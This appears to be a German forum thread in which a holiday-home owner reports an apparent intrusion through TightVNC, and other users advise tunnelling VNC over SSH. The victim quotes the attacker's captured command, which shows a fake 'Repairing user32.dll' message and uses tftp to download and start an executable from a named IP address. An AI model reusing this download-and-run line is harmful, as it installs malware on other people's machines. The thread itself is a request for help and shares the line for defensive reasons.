64.79.213.12 GET cuijvhg.exe & start cuijvhg

ich betreibe eine Wetterstation in unserem Ferienhäuschen mit Fernwartung TightVNC.
seit neuesten werden selbstständig diverse Programme aktiv, als ob ein dritter am Rechner was machen würde. Die Programme werden geöffnet (zb 10x Libertybasic) und bleiben offen stehen.
Dabei wurde auch der Editor benutzt mit dem Versuch etwas abzuspeichern:
r%comspec% /c echo Repairing user32.dll & echo Please wait... & tftp -i 64.79.213.12 GET cuijvhg.exe & start cuijvhg&

Etwas rätselhaft ?! sagt das jemanden etwas? Scheinbar sollte dieses (mir unbekannte) Programm geladen und ausgeführt werden ....

vnc ist imho eine heikle sache. du könntest einen ssh-server aufsetzen und über diesen den vnc-server starten und wieder beenden wenn du es brauchst. das wäre afaik die sicherste methode, da - wie b4ck schon sagte - warscheinlich ein exploit oder ähnliches im spiel ist

hmm es gibt eine neues Update, das werde ich mal draufspielen, vielleicht hilft das.
Mit dem SSH server, da bin ich zuwenig bewandert - um das hinzukriegen. Oder ist das auch für einen Laien easy??? gibt es da eine Anleitung?

Ein SSH Server ist relativ einfach zu bedienen/installieren.
http://sshwindows.sourceforge.net/ <- hab ich mir mal aus Google gesucht.
Ist mit tutorials versehen, also sollte es kein Problem sein (vorrausgesetzt du kannst englisch).
Damit startest du eine Shell (quasi die Windows-Konsole -> also CMD) darüber kannst du Programme starten wie du willst.
Für das abschalten wüsste ich aber imo keine möglichkeit, da muss wohl ein anderer aushelfen!
Imrahil

wenn du den vnc-server dann als dienst eingerichtet hast, kannst du diesen mit net start dienstname starten und mit net stop ... wieder stoppen

Hallo Imrahil,
danke für deinen Tip.
nach etwas rumsuchen bin ich auf: www.openssh.com gekommen.
(ist sogar deutsch...) finde aber nur ein download bei sourceforge.
Also das probiere ich mal, wenn ich das nächste Mal ins Ferienhaus komme !!
Die Tutorials habe ich nicht gefunden ...
Mir fehlt so etwas eine Anleitung für dumme .... gibt es da noch etwas?

Zurück
Oben